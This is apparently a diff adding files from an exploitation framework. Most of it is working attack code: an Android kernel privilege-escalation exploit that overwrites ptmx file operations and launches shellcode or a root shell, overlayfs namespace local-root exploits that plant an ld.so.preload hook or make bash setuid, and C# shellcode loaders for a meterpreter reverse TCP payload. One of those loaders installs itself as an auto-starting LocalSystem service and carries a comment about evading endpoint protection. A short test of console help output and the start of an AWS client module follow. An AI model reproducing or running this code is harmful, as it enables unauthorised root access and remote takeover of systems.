+unsigned long kallsyms_expand_symbol(unsigned long off, char *namebuf) {
+	int len;
+	int skipped_first;
+	unsigned char *tptr;
+	unsigned char *data;
+
+	/* Get the compressed symbol length from the first symbol byte. */
+	data = &kallsyms_names[off];
+	len = *data;
+	off += len + 1;
+	data++;
+
+	skipped_first = 0;
+	while (len > 0) {
+		tptr = &kallsyms_token_table[kallsyms_token_index[*data]];
+		data++;
+		len--;
+
+		while (*tptr > 0) {
+			if (skipped_first != 0) {
+				*namebuf = *tptr;
+				namebuf++;
+			} else {
+				skipped_first = 1;
+			}
+			tptr++;
+		}
+	}
+	*namebuf = '\0';
+
+	return off;
+}
+
+int search_functions() {
+	char namebuf[1024];
+	unsigned long i;
+	unsigned long off;
+	int cnt;
+
+	cnt = 0;
+	for (i = 0, off = 0; i < kallsyms_num_syms; i++) {
+		off = kallsyms_expand_symbol(off, namebuf);
+		if (strcmp(namebuf, "prepare_kernel_cred") == 0) {
+			prepare_kernel_cred_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "commit_creds") == 0) {
+			commit_creds_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "ptmx_open") == 0) {
+			ptmx_open_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "tty_init_dev") == 0) {
+			tty_init_dev_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "tty_release") == 0) {
+			tty_release_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "tty_fasync") == 0) {
+			tty_fasync_address = kallsyms_addresses[i];
+			cnt++;
+		} else if (strcmp(namebuf, "ptmx_fops") == 0) {
+			ptmx_fops_address = kallsyms_addresses[i];
+		}
+	}
+
+	if (cnt < 6) {
+		return -1;
+	}
+
+	return 0;
+}
+
+void analyze_ptmx_open() {
+	unsigned long i, j, k;
+	unsigned long addr;
+	unsigned long val;
+	unsigned long regnum;
+	unsigned long data_addr;
+
+	LOGV("analyze ptmx_open...\n");
+	for (i = 0; i < 0x200; i += 4) {
+		addr = ptmx_open_address + i;
+		read_value_at_address(addr, &val);
+		if ((val & 0xff000000) == 0xeb000000) {
+			if ((((tty_init_dev_address / 4) - (addr / 4 + 2)) & 0x00ffffff) == (val & 0x00ffffff)) {
+				for (j = 1; j <= i; j++) {
+					addr = ptmx_open_address + i - j;
+					read_value_at_address(addr, &val);
+					if ((val & 0xfff0f000) == 0xe5900000) {
+						regnum = (val & 0x000f0000) >> 16;
+						for (k = 1; k <= (i - j); k++) {
+							addr = ptmx_open_address + i - j - k;
+							read_value_at_address(addr, &val);
+							if ((val & 0xfffff000) == (0xe59f0000 + (regnum << 12))) {
+								data_addr = addr + (val & 0x00000fff) + 8;
+								read_value_at_address(data_addr, &val);
+								ptm_driver_address = val;
+								return;
+							}
+						}
+					}
+				}
+			}
+		}
+	}
+
+	return;
+}
+
+unsigned long search_ptmx_fops_address() {
+	unsigned long *addr;
+	unsigned long range;
+	unsigned long *ptmx_fops_open;
+	unsigned long i;
+	unsigned long val, val2, val5;
+
+	LOGV("search ptmx_fops...\n");
+	if (ptm_driver_address != 0) {
+		addr = (unsigned long *)ptm_driver_address;
+	} else {
+		addr = (unsigned long *)(kallsyms_addresses[kallsyms_num_syms - 1]);
+	}
+	addr++;
+	ptmx_fops_open = NULL;
+	range = ((KERNEL_START_ADDRESS + KERNEL_SIZE) - (unsigned long)addr) / sizeof(unsigned long);
+	for (i = 0; i < range - 14; i++) {
+		read_value_at_address((unsigned long)(&addr[i]), &val);
+		if (val == ptmx_open_address) {
+			read_value_at_address((unsigned long)(&addr[i + 2]), &val2);
+			if (val2 == tty_release_address) {
+				read_value_at_address((unsigned long)(&addr[i + 5]), &val5);
+				if (val5 == tty_fasync_address) {
+					ptmx_fops_open = &addr[i];
+					break;
+				}
+			}
+		}
+	}
+
+	if (ptmx_fops_open == NULL) {
+		return 0;
+	}
+	return ((unsigned long)ptmx_fops_open - 0x2c);
+}
+
+int get_addresses() {
+	prepare_kernel_cred_address = 0;
+	commit_creds_address = 0;
+	ptmx_fops_address = 0;
+	ptmx_open_address = 0;
+	tty_init_dev_address = 0;
+	tty_release_address = 0;
+	tty_fasync_address = 0;
+	ptm_driver_address = 0;
+
+	if (get_kallsyms_addresses() != 0) {
+		if (kallsymsmem != NULL) {
+			free(kallsymsmem);
+			kallsymsmem = NULL;
+		}
+		LOGV("kallsyms_addresses search failed.\n");
+		return -1;
+	}
+
+	if (search_functions() != 0) {
+		if (kallsymsmem != NULL) {
+			free(kallsymsmem);
+			kallsymsmem = NULL;
+		}
+		LOGV("search_functions failed.\n");
+		return -1;
+	}
+
+	if (ptmx_fops_address == 0) {
+		analyze_ptmx_open();
+		ptmx_fops_address = search_ptmx_fops_address();
+		if (ptmx_fops_address == 0) {
+			if (kallsymsmem != NULL) {
+				free(kallsymsmem);
+				kallsymsmem = NULL;
+			}
+			LOGV("search_ptmx_fops_address failed.\n");
+			return -1;
+		}
+	}
+
+	if (kallsymsmem != NULL) {
+		free(kallsymsmem);
+		kallsymsmem = NULL;
+	}
+
+	LOGV("\n");
+	LOGV("prepare_kernel_cred=%08lx\n", prepare_kernel_cred_address);
+	LOGV("commit_creds=%08lx\n", commit_creds_address);
+	LOGV("ptmx_fops=%08lx\n", ptmx_fops_address);
+	LOGV("ptmx_open=%08lx\n", ptmx_open_address);
+	LOGV("tty_init_dev=%08lx\n", tty_init_dev_address);
+	LOGV("tty_release=%08lx\n", tty_release_address);
+	LOGV("tty_fasync=%08lx\n", tty_fasync_address);
+	LOGV("ptm_driver=%08lx\n", ptm_driver_address);
+	LOGV("\n");
+
+	return 0;
+}
+
+void obtain_root_privilege(void) {
+	commit_creds(prepare_kernel_cred(0));
+}
+
+static bool run_obtain_root_privilege(void *user_data) {
+	int fd;
+
+	fd = open(PTMX_DEVICE, O_WRONLY);
+	fsync(fd);
+	close(fd);
+
+	return true;
+}
+
+/*
+void ptrace_write_value_at_address(unsigned long int address, void *value) {
+	pid_t pid;
+	long ret;
+	int status;
+
+	bChiled = false;
+	pid = fork();
+	if (pid < 0) {
+		return;
+	}
+	if (pid == 0) {
+		ret = ptrace(PTRACE_TRACEME, 0, 0, 0);
+		if (ret < 0) {
+			LOGV("PTRACE_TRACEME failed\n");
+		}
+		bChiled = true;
+		signal(SIGSTOP, SIG_IGN);
+		kill(getpid(), SIGSTOP);
+		return;
+	}
+
+	do {
+		ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &bChiled, &bChiled);
+	} while (!bChiled);
+
+	ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &value, (void *)address);
+	if (ret < 0) {
+		LOGV("PTRACE_PEEKDATA failed: %s\n", strerror(errno));
+	}
+
+	kill(pid, SIGKILL);
+	waitpid(pid, &status, WNOHANG);
+}
+*/
+
+int pipe_write_value_at_address(unsigned long address, void* value)  
+{  
+    char data[4];  
+    int pipefd[2];  
+    int i;  
+  
+    *(long *)&data = (long)value;  
+  
+    if (pipe(pipefd) == -1) {  
+        perror("pipe");  
+        return 1;  
+    }  
+  
+    for (i = 0; i < (int) sizeof(data) ; i++) {  
+        char buf[256];  
+        buf[0] = 0;  
+        if (data[i]) {  
+            if (write(pipefd[1], buf, data[i]) != data[i]) {  
+                LOGV("error in write().\n");  
+                break;  
+            }  
+        }  
+  
+        if (ioctl(pipefd[0], FIONREAD, (void *)(address + i)) == -1) {  
+            perror("ioctl");  
+            break;  
+        }  
+  
+        if (data[i]) {  
+            if (read(pipefd[0], buf, sizeof buf) != data[i]) {  
+                LOGV("error in read().\n");  
+                break;  
+            }  
+        }  
+    }  
+  
+    close(pipefd[0]);  
+    close(pipefd[1]);  
+  
+    return (i == sizeof (data));  
+}  
+
+bool overwrite_ptmx_fsync_address(unsigned long int address, void *value, bool (*exploit_callback)(void *user_data), void *user_data) {
+	bool success;
+
+	/*ptrace_write_value_at_address(address, value);*/
+	pipe_write_value_at_address(address, value);
+	success = exploit_callback(user_data);
+
+	return success;
+}
+
+static bool run_exploit(void) {
+	unsigned long int ptmx_fops_fsync_address;
+
+	prepare_kernel_cred = (void *)prepare_kernel_cred_address;
+	commit_creds = (void *)commit_creds_address;
+
+	ptmx_fops_fsync_address = ptmx_fops_address + 0x38;
+	return overwrite_ptmx_fsync_address(ptmx_fops_fsync_address, &obtain_root_privilege, run_obtain_root_privilege, NULL);
+}
+
+void init_exploit() {
+
+	if (get_addresses() != 0) {
+		LOGV("Failed to get addresses.\n");
+		return;
+	}
+
+	run_exploit();
+
+	int uid = getuid();
+	if (uid != 0) {
+		LOGV("Failed to get root.\n");
+		return;
+	}
+
+	if (shellcode_buf[0] == 0x90) {
+		LOGV("No shellcode, uid=%d\n", uid);
+		system("/system/bin/sh -i");
+		return;
+	}
+	LOGV("running shellcode, uid=%d\n", uid);
+
+	void *ptr = mmap(0, sizeof(shellcode_buf), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (ptr == MAP_FAILED) {
+		return;
+	}
+	memcpy(ptr, shellcode_buf, sizeof(shellcode_buf));
+	void (*shellcode)() = (void(*)())ptr;
+	shellcode();
+
+	LOGV("exiting.\n");
+}
+
+int main(int argc, char **argv) {
+
+	init_exploit();
+
+	exit(EXIT_SUCCESS);
+}
+
+JNIEXPORT jint JNICALL JNI_OnLoad( JavaVM *vm, void *pvt )
+{
+	JNIEnv *env;
+	LOGV("onload, uid=%d\n", getuid());
+
+	if((*vm)->GetEnv(vm, (void **)&env, JNI_VERSION_1_4) != JNI_OK)
+	{
+		return -1;
+	}
+
+	int pid = fork();
+	if (pid == 0) {
+		init_exploit();
+	}
+	return JNI_VERSION_1_4;
+}
+
+JNIEXPORT void JNICALL JNI_OnUnload( JavaVM *vm, void *pvt )
+{
+}
@@ -0,0 +1,113 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sched.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/mount.h>
+#include <signal.h>
+#include <fcntl.h>
+#include <string.h>
+#include <linux/sched.h>
+
+#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
+
+static char child_stack[1024*1024];
+
+static int
+child_exec(void *stuff)
+{
+    char *file;
+    system("rm -rf /tmp/ns_sploit");
+    mkdir("/tmp/ns_sploit", 0777);
+    mkdir("/tmp/ns_sploit/work", 0777);
+    mkdir("/tmp/ns_sploit/upper",0777);
+    mkdir("/tmp/ns_sploit/o",0777);
+
+    fprintf(stderr,"mount #1\n");
+    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
+// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
+        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
+            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
+            exit(-1);
+        }
+        file = ".access";
+        chmod("/tmp/ns_sploit/work/work",0777);
+    } else file = "ns_last_pid";
+
+    chdir("/tmp/ns_sploit/o");
+    rename(file,"ld.so.preload");
+
+    chdir("/");
+    umount("/tmp/ns_sploit/o");
+    fprintf(stderr,"mount #2\n");
+    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
+        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
+            exit(-1);
+        }
+        chmod("/tmp/ns_sploit/work/work",0777);
+    }
+
+    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
+    umount("/tmp/ns_sploit/o");
+}
+
+int
+main(int argc, char **argv)
+{
+    int status, fd, lib;
+    pid_t wrapper, init;
+    int clone_flags = CLONE_NEWNS | SIGCHLD;
+
+    fprintf(stderr,"spawning threads\n");
+
+    if((wrapper = fork()) == 0) {
+        if(unshare(CLONE_NEWUSER) != 0)
+            fprintf(stderr, "failed to create new user namespace\n");
+
+        if((init = fork()) == 0) {
+            pid_t pid =
+                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
+            if(pid < 0) {
+                fprintf(stderr, "failed to create new mount namespace\n");
+                exit(-1);
+            }
+
+            waitpid(pid, &status, 0);
+
+        }
+
+        waitpid(init, &status, 0);
+        return 0;
+    }
+
+    usleep(300000);
+
+    wait(NULL);
+
+    fprintf(stderr,"child threads done\n");
+
+    fd = open("/etc/ld.so.preload",O_WRONLY);
+
+    if(fd == -1) {
+        fprintf(stderr,"exploit failed\n");
+        exit(-1);
+    }
+
+    fprintf(stderr,"/etc/ld.so.preload created\n");
+    /*
+    fprintf(stderr,"creating shared library\n");
+    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
+    write(lib,LIB,strlen(LIB));
+    close(lib);
+    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
+    if(lib != 0) {
+        fprintf(stderr,"couldn't create dynamic library\n");
+        exit(-1);
+    }*/
+    write(fd,"/tmp/ofs-lib.so\n",16);
+    close(fd);
+    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
+    execl("/bin/su","su",NULL);
+}
+
@@ -0,0 +1,16 @@
+#include <unistd.h>
+
+uid_t(*_real_getuid) (void);
+char path[128];
+
+uid_t getuid(void){
+  _real_getuid = (uid_t(*)(void)) dlsym((void *) -1, "getuid");
+  readlink("/proc/self/exe", (char *) &path, 128);
+  if(geteuid() == 0 && !strcmp(path, "/bin/su")) {
+    unlink("/etc/ld.so.preload");unlink("/tmp/ofs-lib.so");
+    setresuid(0, 0, 0);
+    setresgid(0, 0, 0);
+    execle("/bin/sh", "sh", "-i", NULL, NULL);
+  }
+  return _real_getuid();
+}
@@ -0,0 +1,78 @@
+#include <stdio.h>
+#include <sched.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sched.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <sys/mount.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <fcntl.h>
+#include <string.h>
+#include <linux/sched.h>
+#include <sys/wait.h>
+
+static char child_stack[1024*1024];
+
+static int
+child_exec(void *stuff)
+{
+    system("rm -rf /tmp/haxhax");
+    mkdir("/tmp/haxhax", 0777);
+    mkdir("/tmp/haxhax/w", 0777);
+    mkdir("/tmp/haxhax/u",0777);
+    mkdir("/tmp/haxhax/o",0777);
+
+    if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
+  fprintf(stderr,"mount failed..\n");
+    }
+
+    chmod("/tmp/haxhax/w/work",0777);
+    chdir("/tmp/haxhax/o");
+    chmod("bash",04755);
+    chdir("/");
+    umount("/tmp/haxhax/o");
+    return 0;
+}
+
+int
+main(int argc, char **argv)
+{
+    int status;
+    pid_t wrapper, init;
+    int clone_flags = CLONE_NEWNS | SIGCHLD;
+    struct stat s;
+
+    if((wrapper = fork()) == 0) {
+        if(unshare(CLONE_NEWUSER) != 0)
+            fprintf(stderr, "failed to create new user namespace\n");
+
+        if((init = fork()) == 0) {
+            pid_t pid =
+                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
+            if(pid < 0) {
+                fprintf(stderr, "failed to create new mount namespace\n");
+                exit(-1);
+            }
+
+            waitpid(pid, &status, 0);
+
+        }
+
+        waitpid(init, &status, 0);
+        return 0;
+    }
+
+    usleep(300000);
+
+    wait(NULL);
+
+    stat("/tmp/haxhax/u/bash",&s);
+
+    if(s.st_mode == 0x89ed)
+        execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
+
+    fprintf(stderr,"couldn't create suid :(\n");
+    return -1;
+}
@@ -0,0 +1,86 @@
+using System;
+using System.Runtime.InteropServices;
+
+namespace Wrapper
+{
+    class Program
+    {
+        [Flags]
+        public enum AllocationType : uint
+        {
+            COMMIT = 0x1000,
+            RESERVE = 0x2000,
+            RESET = 0x80000,
+            LARGE_PAGES = 0x20000000,
+            PHYSICAL = 0x400000,
+            TOP_DOWN = 0x100000,
+            WRITE_WATCH = 0x200000
+        }
+
+        [Flags]
+        public enum MemoryProtection : uint
+        {
+            EXECUTE = 0x10,
+            EXECUTE_READ = 0x20,
+            EXECUTE_READWRITE = 0x40,
+            EXECUTE_WRITECOPY = 0x80,
+            NOACCESS = 0x01,
+            READONLY = 0x02,
+            READWRITE = 0x04,
+            WRITECOPY = 0x08,
+            GUARD_Modifierflag = 0x100,
+            NOCACHE_Modifierflag = 0x200,
+            WRITECOMBINE_Modifierflag = 0x400
+        }
+
+        public enum FreeType : uint
+        {
+            MEM_DECOMMIT = 0x4000,
+            MEM_RELEASE = 0x8000
+        }
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
+
+        [DllImport("kernel32.dll")]
+        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+
+        [DllImport("kernel32")]
+        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, FreeType dwFreeType);
+
+        [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
+        public delegate Int32 ExecuteDelegate();
+
+        static void Main()
+        {
+            // msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=<port> LHOST=<host> R| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
+            string shellcode = "MSF_PAYLOAD_SPACE";
+
+
+            byte[] sc = new byte[shellcode.Length];
+
+            for (int i = 0; i < shellcode.Length; i++)
+            {
+                sc[i] = Convert.ToByte(shellcode[i]);
+            }
+
+            // Allocate RWX memory for the shellcode
+            IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
+
+            try
+            {
+                // Copy shellcode to RWX buffer
+                Marshal.Copy(sc, 0, baseAddr, sc.Length);
+
+                // Get pointer to function created in memory
+                ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
+
+                del();
+            }
+            finally
+            {
+                VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
+            }
+        }
+    }
+}
@@ -0,0 +1,221 @@
+
+using System;
+using System.ComponentModel;
+using System.Configuration.Install;
+using System.Net;
+using System.Net.Sockets;
+using System.Runtime.InteropServices;
+using System.ServiceProcess;
+using System.Threading;
+using System.Timers;
+using Timer = System.Timers.Timer;
+
+namespace Wrapper
+{
+    class Program : ServiceBase
+    {
+        #region Fields
+
+        private static Timer _timer; 
+
+        #endregion
+
+        #region PInvoke Setup
+
+        [Flags]
+        public enum AllocationType : uint
+        {
+            COMMIT = 0x1000,
+            RESERVE = 0x2000,
+            RESET = 0x80000,
+            LARGE_PAGES = 0x20000000,
+            PHYSICAL = 0x400000,
+            TOP_DOWN = 0x100000,
+            WRITE_WATCH = 0x200000
+        }
+
+        [Flags]
+        public enum MemoryProtection : uint
+        {
+            EXECUTE = 0x10,
+            EXECUTE_READ = 0x20,
+            EXECUTE_READWRITE = 0x40,
+            EXECUTE_WRITECOPY = 0x80,
+            NOACCESS = 0x01,
+            READONLY = 0x02,
+            READWRITE = 0x04,
+            WRITECOPY = 0x08,
+            GUARD_Modifierflag = 0x100,
+            NOCACHE_Modifierflag = 0x200,
+            WRITECOMBINE_Modifierflag = 0x400
+        }
+
+        public enum FreeType : uint
+        {
+            MEM_DECOMMIT = 0x4000,
+            MEM_RELEASE = 0x8000
+        }
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
+
+        [DllImport("kernel32.dll")]
+        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+
+        [DllImport("kernel32")]
+        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, FreeType dwFreeType);
+
+        [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)]
+        public delegate Int32 ExecuteDelegate(); 
+
+        #endregion
+
+        #region Constructors
+        
+        public Program()
+        {
+            ServiceName = "MsfDynSvc";
+            _timer = new Timer
+                         {
+                             Interval = 20000 // 20 seconds
+                         };
+            _timer.Elapsed += RunShellCode;
+            _timer.AutoReset = true;
+        }
+        
+        #endregion
+
+        #region ServiceBase Methods
+
+        protected override void OnStart(string[] args)
+        {
+            base.OnStart(args);
+            _timer.Start();
+        }
+
+        protected override void OnStop()
+        {
+            base.OnStop();
+            _timer.Stop();
+        }
+
+        #endregion
+
+        static void Main()
+        {
+            Run(new Program());
+        }
+
+        private void RunShellCode(object sender, ElapsedEventArgs e)
+        {
+            _timer.Stop();
+            
+            // only run shellcode if you can connect to localhost:445, due to endpoint protections
+            if (ConnectToLocalhost(445))
+            {
+                try
+                {
+                    // msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=<port> LHOST=<host> R| msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
+                    string shellcode = "MSF_PAYLOAD_SPACE";
+
+                    byte[] sc = new byte[shellcode.Length];
+
+                    for (int i = 0; i < shellcode.Length; i++)
+                    {
+                        sc[i] = Convert.ToByte(shellcode[i]);
+                    }
+
+                    // Allocate RWX memory for the shellcode
+                    IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE);
+                    System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: Couldn't allocate remote memory");
+
+                    try
+                    {
+                        // Copy shellcode to RWX buffer
+                        Marshal.Copy(sc, 0, baseAddr, sc.Length);
+
+                        // Get pointer to function created in memory
+                        ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate));
+
+                        // Run this in a separate thread, so that we can wait for it to die before continuing the timer
+                        Thread thread = new Thread(() => del());
+
+                        thread.Start();
+                        thread.Join(); // Joins it to the main thread, so that when it ends, execution will continue with main thread
+                    }
+                    catch
+                    {
+                        // If the shellcode crashes, try to catch the crash here
+                    }
+                    finally
+                    {
+                        VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE);
+                    }
+                }
+                catch
+                {
+                    // Eat it
+                }
+            }
+            _timer.Start();
+        } 
+
+        private static bool ConnectToLocalhost(int port)
+        {
+            IPAddress localhost = IPAddress.Parse("127.0.0.1");
+            TcpClient tcpClient = new TcpClient();
+
+            bool isSuccess = false;
+            
+            try
+            {
+                tcpClient.Connect(localhost, port);
+                isSuccess = true;
+            }
+            catch
+            {
+                // I know this is bad code-fu, but just eat the error
+            }
+            finally
+            {
+                if (tcpClient.Connected)
+                {
+                    tcpClient.Close();    
+                }
+            }
+
+            return isSuccess;
+        }
+
+    }
+
+    [RunInstaller(true)]
+    public class DotNetAVBypassServiceInstaller : Installer
+    {
+        public DotNetAVBypassServiceInstaller()
+        {
+            var processInstaller = new ServiceProcessInstaller();
+            var serviceInstaller = new ServiceInstaller();
+
+            //set the privileges
+            processInstaller.Account = ServiceAccount.LocalSystem;
+
+            serviceInstaller.DisplayName = "MsfDynSvc";
+            serviceInstaller.StartType = ServiceStartMode.Automatic;
+
+            //must be the same as what was set in Program's constructor
+            serviceInstaller.ServiceName = "MsfDynSvc";
+
+            Installers.Add(processInstaller);
+            Installers.Add(serviceInstaller);
+        }
+
+        public override void Install(System.Collections.IDictionary stateSaver)
+        {
+            base.Install(stateSaver);
+            ServiceController controller = new ServiceController("MsfDynSvc"); // Make sure this name matches the service name!
+            controller.Start();
+        }
+    }
+}
+
@@ -0,0 +1,36 @@
+using System;
+using System.Reflection;
+
+namespace Shellcode
+{
+	class MainClass
+	{
+	public delegate uint Ret1ArgDelegate(uint arg1);
+	    static uint PlaceHolder1(uint arg1) { return 0; }
+	        
+	    unsafe static void Main(string[] args)
+	    {
+	    	string shellcode = "MSF_PAYLOAD_SPACE";
+	    	byte[] asmBytes = new byte[shellcode.Length];
+			for (int i = 0; i < shellcode.Length; i++)
+			{
+			    asmBytes[i] = Convert.ToByte(shellcode[i]);
+			}
+	        fixed(byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
+	        {
+	            // Get the FieldInfo for "_methodPtr"
+	            Type delType = typeof(Delegate);
+	            FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic | BindingFlags.Instance);
+	
+	            // Set our delegate to our x86 code
+	            Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
+	            _methodPtr.SetValue(del, (IntPtr)startAddress);
+	
+	            // Enjoy
+	            uint n = (uint)0xdecafbad;
+	            n = del(n);
+	            Console.WriteLine("{0:x}", n);
+	        }
+	    }
+	}
+}
@@ -1,7 +1,7 @@
 Feature: Help command

  Background:
-    Given I run `msfconsole --defer-module-loads -x help -x exit`
+    Given I run `msfconsole --defer-module-loads -q -x help -x exit`

  Scenario: The 'help' command's output
    Then the output should contain:
@@ -12,51 +12,73 @@ Feature: Help command
          Command       Description
          -------       -----------
          ?             Help menu
-          advanced      Displays advanced options for one or more modules
-          back          Move back from the current context
          banner        Display an awesome metasploit banner
          cd            Change the current working directory
          color         Toggle color
          connect       Communicate with a host
-          edit          Edit the current module with $VISUAL or $EDITOR
          exit          Exit the console
          get           Gets the value of a context-specific variable
          getg          Gets the value of a global variable
          grep          Grep the output of another command
          help          Help menu
-          info          Displays information about one or more modules
+          history       Show command history
          irb           Drop into irb scripting mode
-          jobs          Displays and manages jobs
-          kill          Kill a job
          load          Load a framework plugin
-          loadpath      Searches for and loads modules from a path
-          makerc        Save commands entered since start to a file
-          options       Displays global options or for one or more modules
-          popm          Pops the latest module off the stack and makes it active
-          previous      Sets the previously loaded module as the current module
-          pushm         Pushes the active or list of modules onto the module stack
          quit          Exit the console
-          reload_all    Reloads all modules from all defined module paths
-          rename_job    Rename a job
-          resource      Run the commands stored in a file
          route         Route traffic through a session
          save          Saves the active datastores
-          search        Searches module names and descriptions
-          sess          Interact with a given session
          sessions      Dump session listings and display information about sessions
          set           Sets a context-specific variable to a value
          setg          Sets a global variable to a value
-          show          Displays modules of a given type, or all modules
          sleep         Do nothing for the specified number of seconds
          spool         Write console output into a file as well the screen
          threads       View and manipulate background threads
          unload        Unload a framework plugin
          unset         Unsets one or more context-specific variables
          unsetg        Unsets one or more global variables
-          use           Selects a module by name
          version       Show the framework and console library version numbers


+      Module Commands
+      ===============
+
+          Command       Description
+          -------       -----------
+          advanced      Displays advanced options for one or more modules
+          back          Move back from the current context
+          edit          Edit the current module with $VISUAL or $EDITOR
+          info          Displays information about one or more modules
+          loadpath      Searches for and loads modules from a path
+          options       Displays global options or for one or more modules
+          popm          Pops the latest module off the stack and makes it active
+          previous      Sets the previously loaded module as the current module
+          pushm         Pushes the active or list of modules onto the module stack
+          reload_all    Reloads all modules from all defined module paths
+          search        Searches module names and descriptions
+          show          Displays modules of a given type, or all modules
+          use           Selects a module by name
+
+
+      Job Commands
+      ============
+
+          Command       Description
+          -------       -----------
+          handler       Start a payload handler as job
+          jobs          Displays and manages jobs
+          kill          Kill a job
+          rename_job    Rename a job
+
+
+      Resource Script Commands
+      ========================
+
+          Command       Description
+          -------       -----------
+          makerc        Save commands entered since start to a file
+          resource      Run the commands stored in a file
+
+
      Database Backend Commands
      =========================

@@ -0,0 +1,180 @@
+require 'openssl'
+
+module Metasploit
+  module Framework
+    module Aws
+      module Client
+        USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15"
+        include Msf::Exploit::Remote::HttpClient
+
+        # because Post modules require these to be defined when including HttpClient
+        def register_autofilter_ports(ports=[]); end
+        def register_autofilter_hosts(ports=[]); end
+        def register_autofilter_services(services=[]); end
+
+        def hexdigest(value)
+          if value.nil? || !value.instance_of?(String)
+            print_error "Unexpected value format"
+            return nil
+          end
+          digest = OpenSSL::Digest::SHA256.new
+          if value.respond_to?(:read)
+            chunk = nil
+            chunk_size = 1024 * 1024 # 1 megabyte
+            digest.update(chunk) while chunk = value.read(chunk_size)
+            value.rewind
+          else
+            digest.update(value)
+          end
+          digest.hexdigest
+        end
+
+        def hmac(key, value)
+          if key.nil? || !key.instance_of?(String) || value.nil? || !value.instance_of?(String)
+            print_error "Unexpected key/value format"
+            return nil
+          end
+          OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), key, value)
+        end
